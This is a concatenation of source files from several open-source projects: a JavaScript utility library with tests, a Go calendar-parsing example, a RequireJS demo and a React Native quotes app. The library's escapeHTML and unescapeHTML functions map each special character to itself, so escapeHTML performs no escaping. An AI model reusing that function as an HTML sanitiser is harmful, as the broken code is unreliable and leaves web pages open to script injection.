export const isFunction = value => typeof value === 'function'
/**
* 使用Array.isArray方法检查arr是否为数组类型,返回布尔值。
* @function isArray
* @param {*} arr - 需要检查的值。
* @return {boolean}
* @example
* U.isArray([])
* // => true
*
* U.isArray(null)
* // => false
*/
export const isArray = arr => Array.isArray(arr)
/**
* 检查alue是否为对象类型,返回布尔值。
* @function isObject
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isObject(null)
* // => false
*
* U.isObject([1, 2])
* // => false
*
* U.isObject({})
* // => true
*/
export const isObject = value => value instanceof Object && !isArray(value)
<|start_filename|>test/array.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('lastItem', () => {
const item = U.lastItem([1, 1, 2, 3])
expect(item).toBe(3)
expect(U.lastItem([])).toBeUndefined()
})
test('uniqueItems', () => {
const arr = U.uniqueItems([1, 1, 2, 3, 3, 4, 5])
expect(arr).toEqual([1, 2, 3, 4, 5])
})
test('uniqueItemsBy', () => {
const arr = [
{ id: 0, value: 'a' },
{ id: 1, value: 'b' },
{ id: 2, value: 'c' },
{ id: 0, value: 'd' }
]
expect(U.uniqueItemsBy(arr, (a, b) => a.id == b.id))
.toEqual([
{ id: 0, value: 'a' },
{ id: 1, value: 'b' },
{ id: 2, value: 'c' }
])
expect(U.uniqueItemsBy(arr, (a, b) => a.id == b.id, true))
.toEqual([
{ id: 0, value: 'd' },
{ id: 2, value: 'c' },
{ id: 1, value: 'b' }
])
})
test('repeatItems', () => {
const arr = U.repeatItems([1, 1, 2, 3, 3, 4, 5])
expect(arr).toEqual([1, 3])
})
test('initArray', () => {
const arr1 = U.initArray(3)
expect(arr1).toEqual([null, null, null])
const arr2 = U.initArray(3, {a: 1, b: 2})
expect(arr2).toEqual([{a: 1, b: 2}, {a: 1, b: 2}, {a: 1, b: 2}])
const arr3 = U.initArray(3, (i) => i * 2)
expect(arr3).toEqual([ 0, 2, 4 ])
})
test('mapObject', () => {
let obj = U.mapObject([1, 2, 3], val => val * 2)
expect(obj).toEqual({1: 2, 2: 4, 3: 6})
})
test('averageBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.averageBy(arr, 'a')
expect(r).toBe(1.5)
r = U.averageBy(arr, o => o.a * o.b)
expect(r).toBe(5)
})
test('maxBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.maxBy(arr, 'a')
expect(r).toBe(2)
r = U.maxBy(arr, o => o.a * o.b)
expect(r).toBe(8)
})
test('minBy', () => {
const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
let r = U.minBy(arr, 'a')
expect(r).toBe(1)
r = U.minBy(arr, o => o.a * o.b)
expect(r).toBe(2)
})
test('chunk', () => {
expect(U.chunk).toBeInstanceOf(Function)
const arr = U.chunk([1, 2, 3, 4, 5], 2)
expect(arr).toEqual([[1,2],[3,4],[5]])
})
<|start_filename|>test/function.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('once', () => {
expect(U.once).toBeInstanceOf(Function)
expect(typeof U.once(x => 10)).toBe('function')
const fn = U.once(() => '5')
expect([fn(), fn()]).toEqual(['5', undefined])
})
test('debounce', () => {
expect(U.debounce).toBeInstanceOf(Function)
U.debounce(() => {
expect(true).toBeTruthy();
})
})
test('throttle', () => {
expect(U.throttle).toBeInstanceOf(Function)
let throttled = U.throttle(x => x, 100000);
expect(throttled).toBeInstanceOf(Function);
expect(throttled(10)).toBe(undefined);
})
test('pipe', () => {
expect(U.pipe).toBeInstanceOf(Function)
})
<|start_filename|>rollup.config.js<|end_filename|>
import json from 'rollup-plugin-json'
import resolve from 'rollup-plugin-node-resolve'
import commonjs from 'rollup-plugin-commonjs'
import babel from 'rollup-plugin-babel'
import { uglify } from 'rollup-plugin-uglify'
import { eslint } from 'rollup-plugin-eslint'
const plugins = [
json(),
resolve(),
commonjs(),
eslint({
throwOnError: true,
throwOnWarning: true,
include: ['src/**'],
exclude: ['node_modules/**']
}),
babel({
runtimeHelpers: true,
exclude: 'mode_modules/**' // 不编译mode_modules文件夹下的代码
})
]
export default [
{
input: 'src/usually.js',
output: {
name: 'U',
file: 'dist/usually.js',
format: 'umd'
},
plugins: plugins
},
{
input: 'src/usually.js',
output: {
name: 'U',
file: 'dist/usually.min.js',
format: 'umd'
},
plugins: [
...plugins,
uglify()
]
}
]
<|start_filename|>src/string.js<|end_filename|>
/** @module String */
import { isUndefined } from './type'
import { random } from './number'
/**
* 获取字符串的字节长度
* @function byteSize
* @param {string} str - 字符串
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
export const byteSize = str => new Blob([str]).size
/**
* 反转字符串
* @function reverseString
* @param {string} str - 字符串
* @return {str}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
export const reverseString = str => [...str].reverse().join('')
/**
* 向URL追加参数
* @function stringifyURL
* @param {string} url - URL路径
* @param {object} params - 参数对象
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
export const stringifyURL = (url, params) => {
url += (/\?/).test(url) ? '&' : '?'
return url += Object.keys(params).map(key => `${key}=${params[key]}`).join('&')
}
/**
* 解析URL参数
* @function parseURL
* @param {string} url - 字符串
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
export const parseURL = url => {
const arr = url.match(/([^?=&]+)(=([^&]*))/g) || []
return arr.reduce((a, v) => ((a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1)), a), {})
}
/**
* 移除字符串中的HTML标签
* @function removeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<p>这是<em>一个</em>段落。</p>'
* U.removeHTML(str)
* // => '这是一个段落。'
*/
export const removeHTML = str => str.replace(/<[^>]*>/g, '')
/**
* 转义特殊字符
* @function escapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.escapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
export const escapeHTML = str => str.replace(
/[&<>"]/g,
tag => ({
'&': '&',
'<': '<',
'>': '>',
'"': '"'
}[tag] || tag)
)
/**
* 反转义特殊字符
* @function unescapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.unescapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
export const unescapeHTML = str => str.replace(
/&|<|>|"/g,
tag => ({
'&': '&',
'<': '<',
'>': '>',
'"': '"'
}[tag] || tag)
)
/**
* 使用指定的掩码字符替换start~end之间的所有字符
* @function mask
* @param {string|number} str - 字符串
* @param {number} [start=0] - 可选,开始位置,默认为0(即字符串开头)
* @param {number} [end=0] - 可选,结束位置,默认为0(即字符串结尾)
* @param {string} [mask='*'] - 可选,掩码字符,默认为'*'号
* @return {string}
* @example
* U.mask(123456789) // => *********
* U.mask(123456789, 3) // => 123******
* U.mask(str, 0, 4) // => *****6789
* U.mask(str, 3, 4) // => 123**6789
* U.mask(str, 3, 4, '&') // => 123&&6789
*/
export const mask = (str, start = 0, end = 0, mask = '*') => [...`${str}`].map(
(v, i) => i >= start && i < `${str}`.length - end ? mask : v
).join('')
/**
* 随机生成16进制色值
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
export const randomHex = () => '#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6)
/**
* 随机生成rgba色值
* @function randomRgba
* @param {number} [min=0] - 可选,最小色阶
* @param {number} [max=256] - 可选,最大色阶
* @param {number} [alpha=1] - 可选,透明度
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
export const randomRgba = (min = 0, max = 256, alpha = 1) => {
const color = Array.from({ length: 3 })
.reduce(acc => [...acc, Math.floor(random(min, max))], [])
.concat(alpha ? [alpha] : [0])
.join(',')
return `rgba(${color})`
}
/**
* 将3位16进制色值转为6位
* @function extendHex
* @param {string} shortHex - 字符串
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
export const extendHex = shortHex => {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0)
.split('')
.map(x => x + x)
.join('')
}
/**
* 将16进制hex色值转为rgb(或rgba)色值
* @function hexToRGB
* @param {string} hex - 字符串,16进制hex色值
* @param {number} alpha - 可选,色彩透明度
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
export const hexToRGB = (hex, alpha) => {
const hasAlpha = !isUndefined(alpha)
let result = hex.slice(hex.startsWith('#') ? 1 : 0)
if (result.length === 3) result = [...result].map(s => s + s).join('')
result = result.match(/[0-9a-f]{2}/gi)
.map(s => parseInt(s, 16))
.concat(hasAlpha ? [alpha] : [])
.join(',')
return `rgb${hasAlpha ? 'a' : ''}(${result})`
}
/**
* 将rgb(或rgba)色值转为16进制hex色值
* @function RGBToHex
* @param {string} rgb - 字符串,rgb(或rgba)色值
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
export const RGBToHex = rgb => {
return '#' + rgb.match(/\d{1,3}/g)
.slice(0, 3)
.map(s => Number(s).toString(16).padStart(2, '0'))
.join('')
}
/**
* 解析cookie字符串
* @function parseCookie
* @param {string} str - 字符串
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
export const parseCookie = str => {
return str.split(';')
.map(v => v.split('='))
.reduce((acc, v) => {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim())
return acc
}, {})
}
/**
* 字符串转日期对象
* @function stringToDate
* @param {string} str - 字符串
* @return {date}
* @example
* U.stringToDate('2019/5-06').toString()
* // => Mon May 06 2019 00:00:00 GMT+0800 (中国标准时间)
*
* U.stringToDate('2019-5-06 20:21:22:500').toString()
* // => Mon May 06 2019 20:21:22 GMT+0800 (中国标准时间)
*/
export const stringToDate = str => {
const defs = [0, 1, 1, 0, 0, 0]
const args = str.split(/[^0-9]+/).map((v, i) => {
const val = Number(v) || defs[i]
return i === 1 ? (val - 1) : val
})
return new Date(...args)
}
/**
* 驼峰字符串转横线连接字符串
* @function camelToDash
* @param {string} str - 驼峰字符串
* @return {string}
* @example
* U.camelToDash('camelCase')
* => 'camel-case'
*/
export const camelToDash = str => str.replace(/([A-Z])/g,"-$1").toLowerCase()
/**
* 横线连接字符串转驼峰字符串
* @function dashToCamel
* @param {string} str - 横线连接字符串
* @return {string}
* @example
* U.camelToDash('dash-case')
* => 'dashCase'
*/
export const dashToCamel = str => str.replace(/\-(\w)/g, (a, l) => l.toUpperCase())
| JofunLiang/usually |
<|start_filename|>Makefile<|end_filename|>
clean:
rm -rf node_modules parts
rm -rf .sass-cache
rm -rf src/snowflakes/static/css
| IGVF-DACC/snovault |
<|start_filename|>src/content/top-bar.json<|end_filename|>
{
"bar": {
"text": "Learn how users are using Kata Containers at OpenInfra Live: Keynotes, November 17-18",
"link": "https://www.eventbrite.com/e/openinfra-live-keynotes-tickets-169507530587",
"button": "REGISTER FOR FREE"
}
}
| kata-containers/www.katacontainers.io |
<|start_filename|>examples/rrule/rrule.go<|end_filename|>
package main
import (
"fmt"
"strings"
"time"
"github.com/apognu/gocal"
)
const ics = `
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20190202T130000
DTEND;TZID=Europe/Paris:20190202T150000
DTSTAMP:20180816T112126Z
UID:<EMAIL>
RECURRENCE-ID;TZID=Europe/Paris:20190202T090000
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T112123Z
LOCATION:
SEQUENCE:1
STATUS:CONFIRMED
SUMMARY:1st of month
TRANSP:OPAQUE
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20190102T090000
DTEND;TZID=Europe/Paris:20190102T110000
DTSTAMP:20180816T112126Z
UID:<EMAIL>
RECURRENCE-ID;TZID=Europe/Paris:20190102T090000
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T111457Z
LOCATION:
SEQUENCE:0
STATUS:CONFIRMED
SUMMARY:1st of month (edited)
TRANSP:OPAQUE
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Europe/Paris:20180802T090000
DTEND;TZID=Europe/Paris:20180802T110000
RRULE:FREQ=MONTHLY;BYMONTHDAY=2
EXDATE;TZID=Europe/Paris:20181202T090000
DTSTAMP:20180816T112126Z
UID:4ag<EMAIL>hdh<EMAIL>jl<EMAIL>
CREATED:20180816T110948Z
DESCRIPTION:
LAST-MODIFIED:20180816T110948Z
LOCATION:
SEQUENCE:0
STATUS:CONFIRMED
SUMMARY:1st of month
TRANSP:OPAQUE
END:VEVENT
`
func main() {
start, end := time.Now(), time.Now().Add(12*30*24*time.Hour)
c := gocal.NewParser(strings.NewReader(ics))
c.Start, c.End = &start, &end
c.Parse()
for _, e := range c.Events {
fmt.Printf("%s on %s - %s\n", e.Summary, e.Start, e.End)
}
}
| danesparza/gocal |
<|start_filename|>Gruntfile.js<|end_filename|>
// Grunt configuration.
module.exports = function(grunt) {
grunt.initConfig({
connect: {
server: {
options: {
keepalive: true,
hostname: '127.0.0.1',
port: 8080,
base: '.'
}
}
},
requirejs: {
myaccount: {
options: {
almond: true,
wrap: true,
preserveLicenseComments: false,
wrapShim: true, // 兼容非标准的rquirejs模块
baseUrl: "./multi-page/js",
mainConfigFile: "./multi-page/js/config.js",
findNestedDependencies: true,
name: "myaccount",
out: "./multi-page/js/dist/myaccount.js"
}
},
checkout: {
options: {
almond: true,
wrap: true,
preserveLicenseComments: false,
wrapShim: true, // 兼容非标准的rquirejs模块
baseUrl: "./multi-page/js",
mainConfigFile: "./multi-page/js/config.js",
findNestedDependencies: true,
name: "checkout",
out: "./multi-page/js/dist/checkout.js"
}
}
}
});
grunt.loadNpmTasks('grunt-contrib-connect');
grunt.loadNpmTasks('grunt-requirejs');
// Default task(s).
grunt.registerTask('default', ['requirejs', 'connect']);
};
<|start_filename|>single-page/js/module/moduleC.js<|end_filename|>
// module C
define(function() {
alert('moduleC is executed!');
return {
say: function() {
alert('moduleC is saying...');
}
};
});
<|start_filename|>single-page/js/module/moduleB.js<|end_filename|>
// moduleB
define(['moduleC'], function(moduleC) {
alert('moduleB is executed!');
moduleC.say();
return {
say: function() {
alert('moduleB is saying...');
}
};
});
<|start_filename|>multi-page/js/page/orderInfo.js<|end_filename|>
define(['jquery', 'moduleA', 'ModuleC'],
function($, moduleA, ModuleC) {
function bindChangeOnInput() {
alert('orderInfo bind change on input...');
}
function doSth() {
moduleA.do();
var moduleC = new ModuleC('moduleC');
alert('orderInfo do something...' + moduleC.say());
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>single-page/js/module/moduleA.js<|end_filename|>
// moduleA
define(['moduleB'], function(moduleB) {
alert('moduleA is executed!');
moduleB.say();
return {
say: function() {
alert('moduleA is saying...');
}
};
});
<|start_filename|>multi-page/js/myaccount.js<|end_filename|>
require(['config'], function() {
require(['jquery', 'header', 'footer', 'personInfo', 'shippingAddress'],
function($, header, footer, personInfo, shippingAddress) {
//dom ready
$(function() {
//init comm module
header();
footer();
//init pages
personInfo();
shippingAddress();
console.log('Expected results(you should know why?):');
console.log('header is ok...');
console.log('footer is ok...');
console.log('personInfo bind change on input...');
console.log('moduleA is doing...');
console.log('just test jquery plug function...');
console.log('personInfo do something...');
console.log('shippingAddress bind change on input...');
console.log('moduleB is doing...');
console.log('just use underscore to test shim config...');
console.log('shippingAddress do something...');
});
});
});
<|start_filename|>multi-page/js/page/shippingAddress.js<|end_filename|>
define(['jquery', 'moduleB'],
function($, moduleB) {
function bindChangeOnInput() {
alert('shippingAddress bind change on input...');
}
function doSth() {
moduleB.do();
alert('shippingAddress do something...');
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/module/ModuleC.js<|end_filename|>
define(['jquery'],
function($) {
function ModuleC(name) {
this.name = name;
}
ModuleC.prototype.say = function() {
return 'I am: ' + this.name;
};
return ModuleC;
});
<|start_filename|>multi-page/js/module/moduleB.js<|end_filename|>
define(['jquery', 'underscore'], function($, _) {
return {
do: function() {
alert('moduleB is doing...');
_.each([1], function() {
alert('just use underscore to test shim config...');
});
}
};
});
<|start_filename|>multi-page/js/checkout.js<|end_filename|>
require(['config'], function() {
require(['jquery', 'header', 'footer', 'paymentInfo', 'orderInfo'],
function($, header, footer, paymentInfo, orderInfo) {
//dom ready
$(function() {
//init comm module
header();
footer();
//init pages
paymentInfo();
orderInfo();
console.log('Expected results(you should know why?):');
console.log('header is ok...');
console.log('footer is ok...');
console.log('paymentInfo bind change on input...');
console.log('moduleB is doing...');
console.log('just use underscore to test shim config...');
console.log('paymentInfo do something...I am: moduleC');
console.log('orderInfo bind change on input...');
console.log('moduleA is doing...');
console.log('just test jquery plug function...');
console.log('orderInfo do something...I am: moduleC');
});
});
});
<|start_filename|>multi-page/js/lib/jquery.plugTest.js<|end_filename|>
;(function($) {
$.fn.plugTest = function() {
return this.each(function() {
alert('just test jquery plug function...');
});
};
})(jQuery);
<|start_filename|>single-page/js/main.js<|end_filename|>
requirejs.config({
baseUrl: 'js',
paths: {
jquery: 'lib/jquery-1.11.1',
moduleA: 'module/moduleA',
moduleB: 'module/moduleB',
moduleC: 'module/moduleC'
}
});
requirejs(['jquery', 'moduleA'], function($, moduleA) {
// DOM ready
$(function() {
alert('document is ready...');
moduleA.say();
console.log('Expected results(you should know why?):');
console.log('1. moduleC is executed!');
console.log('2. moduleB is executed!');
console.log('3. moduleC is saying...');
console.log('4. moduleA is executed!');
console.log('5. moduleB is saying...');
console.log('6. document is ready...');
console.log('7. moduleA is saying...');
});
});
<|start_filename|>multi-page/js/page/personInfo.js<|end_filename|>
define(['jquery', 'moduleA'],
function($, moduleA) {
function bindChangeOnInput() {
alert('personInfo bind change on input...');
}
function doSth() {
moduleA.do();
alert('personInfo do something...');
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/config.js<|end_filename|>
requirejs.config({
baseUrl: 'js',
paths: {
jquery: 'lib/jquery-1.11.1',
underscore: 'lib/underscore-min',
plugTest: 'lib/jquery.plugTest',
Handlebars: 'lib/handlebars',
personInfo: 'page/personInfo',
shippingAddress: 'page/shippingAddress',
paymentInfo: 'page/paymentInfo',
orderInfo: 'page/orderInfo',
header: 'module/header',
footer: 'module/footer',
moduleA: 'module/moduleA',
moduleB: 'module/moduleB',
ModuleC: 'module/ModuleC'
},
shim: {
'underscore': {
exports: '_'
},
'Handlebars': {
exports: 'Handlebars'
},
'plugTest': {
deps: ['jquery'],
exports: 'jQuery.fn.plugTest'
}
}
});
<|start_filename|>multi-page/js/module/header.js<|end_filename|>
define(['jquery'], function($) {
return function() {
alert('header is ok...');
};
});
<|start_filename|>multi-page/js/page/paymentInfo.js<|end_filename|>
define(['jquery', 'moduleB', 'ModuleC'],
function($, moduleB, ModuleC) {
function bindChangeOnInput() {
alert('paymentInfo bind change on input...');
}
function doSth() {
moduleB.do();
var moduleC = new ModuleC('moduleC');
alert('paymentInfo do something...' + moduleC.say());
}
return function() {
bindChangeOnInput();
doSth();
};
});
<|start_filename|>multi-page/js/module/moduleA.js<|end_filename|>
define(['jquery', 'plugTest', 'Handlebars'], function($, plugTest, Handlebars) {
Handlebars.registerHelper('compare', function(old, suggest) {
if(old === suggest) {
return suggest;
} else {
return new Handlebars.SafeString('<span class="address-changed">' + suggest + '</span>');
}
});
return {
do: function() {
alert('moduleA is doing...');
$('body').plugTest();
}
};
});
| nange/requirejs-guide |
<|start_filename|>src/components/index.js<|end_filename|>
import AnimatedTextSwitch from './AnimatedTextSwitch';
import AnimatedBackgroundSwitch from './AnimatedBackgroundSwitch';
import AnimatedIconSwitch from './AnimatedIconSwitch';
import ToggleButton from './ToggleButton';
export {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
ToggleButton,
};
<|start_filename|>src/modules/quote/QuoteView.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
View,
TouchableWithoutFeedback,
} from 'react-native';
import {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import styles from '../quotes/styles';
import { BG_TYPES } from '../quotes/QuotesState';
QuoteView.propTypes = {
navigation: PropTypes.shape({
pop: PropTypes.func.isRequired,
state: PropTypes.shape({
params: PropTypes.shape({
quote: PropTypes.shape({
quote: PropTypes.string,
author: PropTypes.string,
}),
}),
}),
}).isRequired,
updateContainerRef: PropTypes.func.isRequired,
toggleBookmark: PropTypes.func.isRequired,
shareQuote: PropTypes.func.isRequired,
isSharing: PropTypes.bool.isRequired,
isBookmarked: PropTypes.bool.isRequired,
};
export default function QuoteView(props) {
const {
navigation,
updateContainerRef,
shareQuote,
isSharing,
isBookmarked,
toggleBookmark,
} = props;
const { quote } = navigation.state.params;
const isDarkBg = quote.bgType === BG_TYPES.BG_BLACK;
return (
<TouchableWithoutFeedback
onPress={() => navigation.pop()}
>
<AnimatedBackgroundSwitch
ref={ref => updateContainerRef(ref)}
isDark={isDarkBg}
style={{
...styles.container,
}}
>
<View style={styles.header}>
<AnimatedIconSwitch
source={require('../../../assets/icons/quote.png')}
style={{
...styles.headerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
{ quote && (
<View style={styles.quoteContainer}>
<AnimatedTextSwitch
style={{
...styles.quoteText,
...isDarkBg ? styles.quoteTextLight : {},
}}
>
{quote.quote}
</AnimatedTextSwitch>
<AnimatedTextSwitch
style={{
...styles.quoteAuthor,
...isDarkBg ? styles.quoteAuthorLight : {},
}}
>
{quote.author}
</AnimatedTextSwitch>
</View>
)}
{ !isSharing && (
<View style={styles.footer}>
<AnimatedTextSwitch
style={{
...styles.footerHelpText,
}}
>
tap to go back
</AnimatedTextSwitch>
<View style={styles.footerIcons}>
<TouchableWithoutFeedback onPress={toggleBookmark}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={isBookmarked ?
require('../../../assets/icons/bookmark-filled.png') :
require('../../../assets/icons/bookmark.png')
}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
<TouchableWithoutFeedback onPress={shareQuote}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={require('../../../assets/icons/share.png')}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
</View>
</View>
)}
</AnimatedBackgroundSwitch>
</TouchableWithoutFeedback>
);
}
<|start_filename|>src/modules/quote/QuoteViewContainer.js<|end_filename|>
import { compose, withHandlers, withState } from 'recompose';
import Realm from 'realm';
import { Alert } from 'react-native';
import { captureRef } from 'react-native-view-shot';
import Share from 'react-native-share';
import QuoteView from './QuoteView';
import { QuoteSchema } from '../quotes/QuotesState';
export default compose(
withState('isSharing', 'setIsSharing', false),
withState('isBookmarked', 'setIsBookmarked', true),
withHandlers(() => {
// Reference to container element
let _containerRef = null;
return {
updateContainerRef: () => (ref) => {
_containerRef = ref;
},
shareQuote: props => async () => {
// isSharing prop hides components before making a screen shot
props.setIsSharing(true);
// setTimeout to ensure that component will be re-rendered
setTimeout(async () => {
if (_containerRef) {
try {
// Capturing screenshot of the view by ref
const uri = await captureRef(_containerRef, {
format: 'jpg',
quality: 1,
});
// Sharing captured screenshot
await Share.open({
url: uri,
});
} catch (e) {
if (e.error !== 'User did not share') {
Alert.alert('Something went wrong', 'We are so sorry, but something unexpected happened :(');
}
} finally {
props.setIsSharing(false);
}
}
});
},
toggleBookmark: props => () => {
props.setIsBookmarked(!props.isBookmarked);
const { quote } = props.navigation.state.params;
// Updating the quote inside database
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
const realmQuote = realm.objects('Quote').filtered(`id = ${quote.id}`)[0];
realm.write(() => {
realmQuote.bookmarked = !realmQuote.bookmarked;
});
realm.close();
});
},
};
}),
)(QuoteView);
<|start_filename|>src/modules/quotes/QuotesViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import { StatusBar, Alert } from 'react-native';
import { captureRef } from 'react-native-view-shot';
import Share from 'react-native-share';
import {
compose,
lifecycle,
withHandlers,
withState,
} from 'recompose';
import QuotesView from './QuotesView';
import {
loadQuotes,
newQuote,
toggleBookmark,
} from './QuotesState';
export default compose(
connect(
state => ({
quotes: state.quotes.quotesList,
quotesLoaded: state.quotes.quotesLoaded,
currentQuote: state.quotes.currentQuote,
isDarkBg: state.quotes.isDarkBg,
}),
dispatch => ({
loadQuotes: () => dispatch(loadQuotes()),
newQuote: () => dispatch(newQuote()),
toggleBookmark: quote => dispatch(toggleBookmark(quote)),
}),
),
withState('isSharing', 'setIsSharing', false),
withState('isMenuOpened', 'setIsMenuOpened', false),
withHandlers(() => {
let _containerRef = null;
return {
updateContainerRef: () => (ref) => {
_containerRef = ref;
},
shareQuote: props => async () => {
props.setIsSharing(true);
setTimeout(async () => {
if (_containerRef) {
try {
const uri = await captureRef(_containerRef, {
format: 'jpg',
quality: 1,
});
await Share.open({
url: uri,
});
} catch (e) {
if (e.error !== 'User did not share') {
Alert.alert('Something went wrong', 'We are so sorry, but something unexpected happened :(');
}
} finally {
props.setIsSharing(false);
}
}
});
},
};
}),
lifecycle({
componentDidMount() {
StatusBar.setHidden(true);
if (!this.props.quotesLoaded) {
this.props.loadQuotes();
}
},
componentDidUpdate() {
if (this.props.quotesLoaded && !this.props.currentQuote) {
this.props.newQuote();
}
},
}),
)(QuotesView);
<|start_filename|>src/config/index.js<|end_filename|>
import { Platform } from 'react-native';
export const colors = {
light: '#FFFFFF',
dark: '#000000',
gray: '#96979F',
lightGray: '#F4F6F8',
darkGray: '#323643',
flatDarkGray: '#2B2B2B',
};
export const fonts = {
primaryRegular: Platform.select({
iOS: 'System',
android: 'SF-Pro-Text-Regular',
}),
primaryLight: Platform.select({
iOS: 'System',
android: 'SF-Pro-Text-Light',
}),
};
export default {
defaultAnimationDuration: 400,
};
export const credentialsLink = 'https://apps.insider.io';
<|start_filename|>src/modules/bookmarks/BookmarksViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import Realm from 'realm';
import {
compose, withState, withHandlers,
} from 'recompose';
import { QuoteSchema } from '../quotes/QuotesState';
import BookmarksView from './BookmarksView';
export default compose(
connect(
state => ({
isDarkBg: state.quotes.isDarkBg,
}),
),
withState('bookmarksList', 'setBookmarksList', []),
withHandlers({
updateBookmarks: props => () => {
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
// Selecting all bookmarked quotes
const bookmarks = realm.objects('Quote').filtered('bookmarked = true');
// Need to convert Realm object to JS TODO: Find better solution
const bookmarksJSed = JSON.parse(JSON.stringify(bookmarks));
const bookmarksArray = [];
Object.keys(bookmarksJSed).forEach(index => bookmarksArray.push(bookmarksJSed[index]));
props.setBookmarksList(bookmarksArray);
realm.close();
});
},
}),
withHandlers({
// Handler that fires when the user navigate on the screen
onWillFocus: props => () => {
props.updateBookmarks();
},
}),
)(BookmarksView);
<|start_filename|>src/components/__tests__/ToggleButton.spec.js<|end_filename|>
/* eslint-disable no-undef */
import React from 'react';
import Enzyme from 'enzyme';
import Adapter from 'enzyme-adapter-react-16';
import { ToggleButton } from '../index';
Enzyme.configure({ adapter: new Adapter() });
describe('Testing ToggleButton component', () => {
it('renders as expected', () => {
const wrapper = Enzyme.shallow(
<ToggleButton>
Hello
</ToggleButton>,
);
expect(wrapper).toMatchSnapshot();
});
});
<|start_filename|>src/modules/quotes/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
backgroundColor: colors.light,
...ifIphoneX({
paddingVertical: 30,
}),
},
loadingContainer: {
flex: 1,
alignItems: 'center',
justifyContent: 'center',
backgroundColor: colors.dark,
},
containerDark: {
backgroundColor: colors.dark,
},
quoteContainer: {
flex: 1,
justifyContent: 'center',
},
quoteText: {
fontFamily: fonts.primaryLight,
fontSize: '1.5rem',
fontWeight: '200',
color: colors.dark,
lineHeight: '2.2rem',
},
quoteTextLight: {
color: colors.light,
},
quoteAuthor: {
fontFamily: fonts.primaryLight,
color: colors.gray,
fontSize: '1rem',
fontWeight: '100',
marginTop: '1.2rem',
},
quoteAuthorLight: {
color: colors.gray,
},
header: {
flexDirection: 'row',
justifyContent: 'space-between',
},
headerIcon: {
width: '1rem',
tintColor: colors.dark,
},
headerIconMenu: {
width: '1.3rem',
},
headerIconLight: {
tintColor: colors.light,
},
footer: {
flexDirection: 'row',
justifyContent: 'space-between',
},
footerHelpText: {
flex: 1,
fontFamily: fonts.primaryLight,
color: 'gray',
fontSize: '1.2rem',
fontWeight: '100',
paddingVertical: '0.5rem',
},
footerIcons: {
flexDirection: 'row',
justifyContent: 'flex-end',
alignItems: 'center',
},
footerIconContainer: {
paddingVertical: '0.5rem',
paddingHorizontal: '0.3rem',
},
footerIcon: {
height: '1.2rem',
width: '1.2rem',
marginHorizontal: '0.5rem',
tintColor: colors.dark,
},
footerIconLight: {
tintColor: colors.light,
},
});
